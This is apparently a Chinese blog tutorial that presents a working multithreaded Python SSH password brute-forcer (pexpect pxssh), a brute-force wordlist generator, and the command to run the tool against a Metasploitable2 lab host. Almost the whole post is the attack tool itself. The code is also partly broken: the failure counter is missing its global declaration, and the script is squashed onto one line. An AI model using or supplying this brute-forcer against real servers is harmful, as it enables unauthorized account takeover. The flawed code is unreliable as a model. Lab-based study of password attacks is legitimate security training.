利用python進行ssh密碼驗證
阿新 • • 發佈:2018-11-23
首先準備好環境
1、虛擬機器kali Linux、metasploitable2-linux。
pip install pexpect
---------------------------------------------------------
2、原始碼
#!/usr/bin/python #coding: utf-8 from pexpect import pxssh import optparse import time from threading import * maxConnections=5 connection_lock = BoundedSemaphore(value=maxConnections) Found=False Fails=0 def connect(host,user,password,release): global Found global Found try: s=pxssh.pxssh() s.login(host,user,password) print'[+] Password Found:' + password Found=True except Exception, e: if 'read_nonblocking' in str(e): Fails+=1 time.sleep(5) connect(host,user,password,False) elif 'synchronize with original prompt' in str(e): time.sleep(1) connect(host,user,password,False) finally: if release: connection_lock.release() def main(): parser=optparse.OptionParser() parser.add_option('-H',dest='host',type='string') parser.add_option('-u',dest='username',type='string') parser.add_option('-f',dest='file',type='string') (options,args)=parser.parse_args() if (options.host == None) | (options.username == None) | (options.file == None): print parser.usage exit(0) host = options.host username=options.username file=options.file fn = open(file,'r') for line in fn.readlines(): if Found: print '[*] Exting: Passwrod Found' exit(0) if Fails > 5: print '[!] Exiting: Too Many Socket Timeouts' exit(0) connection_lock.acquire() password=line.strip('\r').strip('\n') print '[-] Testing:' + str(password) t = Thread(target=connect,args=(host,username,password,True)) child=t.start() if __name__=='__main__': main()
字典生成器:
import itertools as its
from threading import Thread
def main():
words = "ms.f1admin"
r = its.product(words,repeat=8)
dic = open("pass.txt","a") 寫入pass.txt檔案
for i in r:
dic.write("".join(i))
dic.write("".join("\n"))
dic.close()
main()
3、實際效果:
終端執行如下命令:
# python ssh.py -H 192.168.5.3 -u msfadmin -f pass.txt